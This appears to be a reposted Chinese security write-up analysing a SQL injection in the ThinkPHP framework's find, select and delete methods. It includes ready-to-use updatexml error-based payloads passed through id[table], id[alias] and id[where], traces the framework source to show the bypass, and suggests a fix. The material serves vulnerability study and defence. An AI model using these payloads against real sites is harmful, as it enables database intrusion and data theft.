控制器代码:
public function index(){
$id=I('id');
$res=M('users')->find($id);
dump($res);
}
复现:
payload:
id[table]=users where 1 and updatexml(1,concat(0x7e,user(),0x7e),1)--
id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
分析:
1、find函数
1 public function find($options=array()) {
2 if(is_numeric($options) || is_string($options)) {
3 $where[$this->getPk()] = $options;
4 $options = array();
5 $options['where'] = $where;
6 }
7 // 根据复合主键查找记录
8 $pk = $this->getPk();
9 if (is_array($options) && (count($options) > 0) && is_array($pk)) {
10 // 根据复合主键查询
11 $count = 0;
12 foreach (array_keys($options) as $key) {
13 if (is_int($key)) $count++;
14 }
15 if ($count == count($pk)) {
16 $i = 0;
17 foreach ($pk as $field) {
18 $where[$field] = $options[$i];
19 unset($options[$i++]);
20 }
21 $options['where'] = $where;
22 } else {
23 return false;
24 }
25 }
26 // 总是查找一条记录
27 $options['limit'] = 1;
28 // 分析表达式
29 $options = $this->_parseOptions($options);
30 // 判断查询缓存
31 if(isset($options['cache'])){
32 $cache = $options['cache'];
33 $key = is_string($cache['key'])?$cache['key']:md5(serialize($options));
34 $data = S($key,'',$cache);
35 if(false !== $data){
36 $this->data = $data;
37 return $data;
38 }
39 }
40 $resultSet = $this->db->select($options);
41 if(false === $resultSet) {
42 return false;
43 }
44 if(empty($resultSet)) {// 查询结果为空
45 return null;
46 }
47 if(is_string($resultSet)){
48 return $resultSet;
49 }
50
51 // 读取数据后的处理
52 $data = $this->_read_data($resultSet[0]);
53 $this->_after_find($data,$options);
54 if(!empty($this->options['result'])) {
55 return $this->returnResult($data,$this->options['result']);
56 }
57 $this->data = $data;
58 if(isset($cache)){
59 S($key,$data,$cache);
60 }
61 return $this->data;
62 }我们输入的的id[where]为数组,所以就可以跳过第二行的所执行的内容,如果正常输入则会将使变量option['where']赋一个数组,当我们跳过这里的赋值时,也就跳过了第29行中
_parseOptions函数中对字段类型验证的判断。
第29行传入了options变量也就时说我们对options变量可控,而第40行中执行了options中的sql语句,所以实现sql注入
2、_parseOptions函数分析
1 protected function _parseOptions($options=array()) {
2 if(is_array($options))
3 $options = array_merge($this->options,$options);
4
5 if(!isset($options['table'])){
6 // 自动获取表名
7 $options['table'] = $this->getTableName();
8 $fields = $this->fields;
9 }else{
10 // 指定数据表 则重新获取字段列表 但不支持类型检测
11 $fields = $this->getDbFields();
12 }
13
14 // 数据表别名
15 if(!empty($options['alias'])) {
16 $options['table'] .= ' '.$options['alias'];
17 }
18 // 记录操作的模型名称
19 $options['model'] = $this->name;
20
21 // 字段类型验证
22 if(isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join'])) {
23 // 对数组查询条件进行字段类型检查
24 foreach ($options['where'] as $key=>$val){
25 $key = trim($key);
26 if(in_array($key,$fields,true)){
27 if(is_scalar($val)) {
28 $this->_parseType($options['where'],$key);
29 }
30 }elseif(!is_numeric($key) && '_' != substr($key,0,1) && false === strpos($key,'.') && false === strpos($key,'(') && false === strpos($key,'|') && false === strpos($key,'&')){
31 if(!empty($this->options['strict'])){
32 E(L('_ERROR_QUERY_EXPRESS_').':['.$key.'=>'.$val.']');
33 }
34 unset($options['where'][$key]);
35 }
36 }
37 }
38 // 查询过后清空sql表达式组装 避免影响下次查询
39 $this->options = array();
40 // 表达式过滤
41 $this->_options_filter($options);
42 return $options;
43 }第15、16行将options['alias']的值加在了options['table']后面,而在之后sql语句替换中可以将options['table']的值替换到sql语句当中的,所以也可以sql注入
第22行中由于options绕过了开头的if判断,所以options['where']不再是数组,所以这里也就绕过了字符类型判断
3、select函数分析
1 public function select($options=array()) {
2 $this->model = $options['model'];
3 $this->parseBind(!empty($options['bind'])?$options['bind']:array());
4 $sql = $this->buildSelectSql($options);
5 $result = $this->query($sql,!empty($options['fetch_sql']) ? true : false);
6 return $result;
7 }这里主要是buildSelectSql函数对sql语句的建立
4、buildSelectSql函数分析
1 public function buildSelectSql($options=array()) {
2 if(isset($options['page'])) {
3 // 根据页数计算limit
4 list($page,$listRows) = $options['page'];
5 $page = $page>0 ? $page : 1;
6 $listRows= $listRows>0 ? $listRows : (is_numeric($options['limit'])?$options['limit']:20);
7 $offset = $listRows*($page-1);
8 $options['limit'] = $offset.','.$listRows;
9 }
10 $sql = $this->parseSql($this->selectSql,$options);
11 return $sql;
12 }5、parseSql函数分析
1 public function parseSql($sql,$options=array()){
2 $sql = str_replace(
3 array('%TABLE%','%DISTINCT%','%FIELD%','%JOIN%','%WHERE%','%GROUP%','%HAVING%','%ORDER%','%LIMIT%','%UNION%','%LOCK%','%COMMENT%','%FORCE%'),
4 array(
5 $this->parseTable($options['table']),
6 $this->parseDistinct(isset($options['distinct'])?$options['distinct']:false),
7 $this->parseField(!empty($options['field'])?$options['field']:'*'),
8 $this->parseJoin(!empty($options['join'])?$options['join']:''),
9 $this->parseWhere(!empty($options['where'])?$options['where']:''),
10 $this->parseGroup(!empty($options['group'])?$options['group']:''),
11 $this->parseHaving(!empty($options['having'])?$options['having']:''),
12 $this->parseOrder(!empty($options['order'])?$options['order']:''),
13 $this->parseLimit(!empty($options['limit'])?$options['limit']:''),
14 $this->parseUnion(!empty($options['union'])?$options['union']:''),
15 $this->parseLock(isset($options['lock'])?$options['lock']:false),
16 $this->parseComment(!empty($options['comment'])?$options['comment']:''),
17 $this->parseForce(!empty($options['force'])?$options['force']:'')
18 ),$sql);
19 return $sql;
20 }这里将options中的值进行查找替换,所以很多值都可以进行替换这里我们输入的时where,在parseWhere函数中将%where%的值替换
最终得到执行的sql语句:
delete,find,select这三个函数都具有此漏洞
防护:
将传入的$option修改成$this->options,同时不对$options进行表达式分析,使options不可控,这里主要是通过_parseOptions函数对options的表达式分析之后形成sql注入。
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
